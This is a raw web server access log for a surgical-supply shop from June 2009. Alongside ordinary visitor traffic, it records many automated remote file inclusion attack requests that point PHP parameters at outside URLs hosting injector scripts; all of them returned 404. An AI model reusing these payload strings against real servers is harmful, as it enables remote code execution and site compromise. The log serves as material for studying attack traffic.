211.203.180.144 - - [16/Jun/2009:02:53:10 -0400] "GET /logs/error_log.Q109052100//admin/editor2/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/rfi.txt?%0D?? HTTP/1.1" 404 261 "-" "libwww-perl/5.79"
88.108.236.6 - - [16/Jun/2009:02:53:16 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
88.108.236.6 - - [16/Jun/2009:02:53:16 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
88.108.236.6 - - [16/Jun/2009:02:53:17 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
88.108.236.6 - - [16/Jun/2009:02:53:17 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
218.249.36.194 - - [16/Jun/2009:02:53:21 -0400] "GET /logs/access_log.Q109052100%20%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.unreals.co.cc/idxx.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:53:31 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
124.217.216.86 - - [16/Jun/2009:02:53:40 -0400] "GET /logs/error_log.Q109052100%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
124.217.216.86 - - [16/Jun/2009:02:53:46 -0400] "GET /logs/error_log.Q109052100%20//admin/editor2/spaw_control.class.php?spaw_root=http://www.fzv.uni-mb.si/page/components/perkosa.txt??? HTTP/1.1" 404 262 "-" "libwww-perl/5.826"
211.49.99.7 - - [16/Jun/2009:02:53:48 -0400] "GET /logs/access_log.Q109060400%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:02:53:49 -0400] "GET /logs/error_log.Q107111900 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.151.2.98 - - [16/Jun/2009:02:53:55 -0400] "GET /logs/access_log.Q109051600//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:53:55 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:53:55 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:53:56 -0400] "GET /logs/access_log.Q109051600//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:53:56 -0400] "GET //index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:53:56 -0400] "GET /logs//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
209.59.12.99 - - [16/Jun/2009:02:54:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
216.151.2.98 - - [16/Jun/2009:02:54:15 -0400] "GET /logs/access_log.Q109060500//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
216.151.2.98 - - [16/Jun/2009:02:54:17 -0400] "GET /logs/access_log.Q109060500//index.php?_SERVER[DOCUMENT_ROOT]=http://tahede.ucoz.com/idrfi.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
79.178.11.4 - - [16/Jun/2009:02:54:40 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37 HTTP/1.1" 200 76245 "http://www.acesurgical.com/rcm6.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:41 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:41 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:41 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:42 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:42 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:42 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:42 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:43 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:43 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
211.189.40.249 - - [16/Jun/2009:02:54:43 -0400] "GET /logs/error_log.Q109060700%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://bimonet.zat.su/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.189.40.249 - - [16/Jun/2009:02:54:43 -0400] "GET /logs//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://bimonet.zat.su/id1.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.189.40.249 - - [16/Jun/2009:02:54:43 -0400] "GET //index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://bimonet.zat.su/id1.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
211.189.40.249 - - [16/Jun/2009:02:54:43 -0400] "GET /logs/access_log.Q109052400%20%20//index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://bimonet.zat.su/id1.txt??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.178.11.4 - - [16/Jun/2009:02:54:43 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:43 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:44 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:44 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:44 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:44 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:44 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:44 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:45 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:45 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:45 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:45 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:46 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:46 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:46 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:46 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
79.178.11.4 - - [16/Jun/2009:02:54:46 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6)"
195.34.78.110 - - [16/Jun/2009:02:54:53 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:54:53 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:54:53 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:54:54 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:54:54 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:54:54 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:54:54 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
130.13.170.93 - - [16/Jun/2009:02:54:55 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:54:55 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
195.34.78.110 - - [16/Jun/2009:02:54:55 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
130.13.170.93 - - [16/Jun/2009:02:54:55 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
195.34.78.110 - - [16/Jun/2009:02:54:55 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:54:55 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
130.13.170.93 - - [16/Jun/2009:02:54:56 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:54:56 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
195.34.78.110 - - [16/Jun/2009:02:55:02 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:02 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:02 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.49.99.7 - - [16/Jun/2009:02:55:05 -0400] "GET /logs/access_log.Q109052200%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.yak.com.pl/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:09 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:10 -0400] "GET /main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:10 -0400] "GET /logs/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:10 -0400] "GET /logs/access_log.Q109051800/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:13 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:14 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
72.36.131.98 - - [16/Jun/2009:02:55:15 -0400] "GET /logs/access_log.Q108111700 HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
195.34.78.110 - - [16/Jun/2009:02:55:18 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
195.34.78.110 - - [16/Jun/2009:02:55:28 -0400] "GET /logs/access_log.Q109060100/main.php?appserv_root=http://botscanner.michael17.com/BotId1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
130.13.170.93 - - [16/Jun/2009:02:55:45 -0400] "POST /cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929 HTTP/1.1" 200 37475 "http://acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:46 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
81.175.71.121 - - [16/Jun/2009:02:55:47 -0400] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.arpinphilately.com/upload/id1.txt? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:47 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:48 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:48 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
130.13.170.93 - - [16/Jun/2009:02:55:48 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):CSTSIGN+WEBCSTWRK(A0070):0099929" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.11) Gecko/2009060214 Firefox/3.0.11"
